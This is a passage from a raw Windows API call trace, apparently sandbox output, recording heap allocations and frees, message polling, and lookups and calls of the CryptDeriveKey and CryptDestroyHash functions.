hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0232.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0232.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0232.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0232.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0232.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0232.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0232.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0232.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0232.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0232.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0232.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51490 [0232.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51490, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0232.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.799] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0232.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0232.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0232.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0232.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.800] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87490) returned 1 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0232.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0232.801] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.801] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.801] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0232.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0232.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b88 [0232.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0232.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0232.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0232.802] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0232.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0232.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0232.802] CryptDestroyHash (hHash=0xa87250) returned 1 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0232.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0232.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0232.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0232.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.804] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0232.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0232.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0232.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f940 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f850 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fad0 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 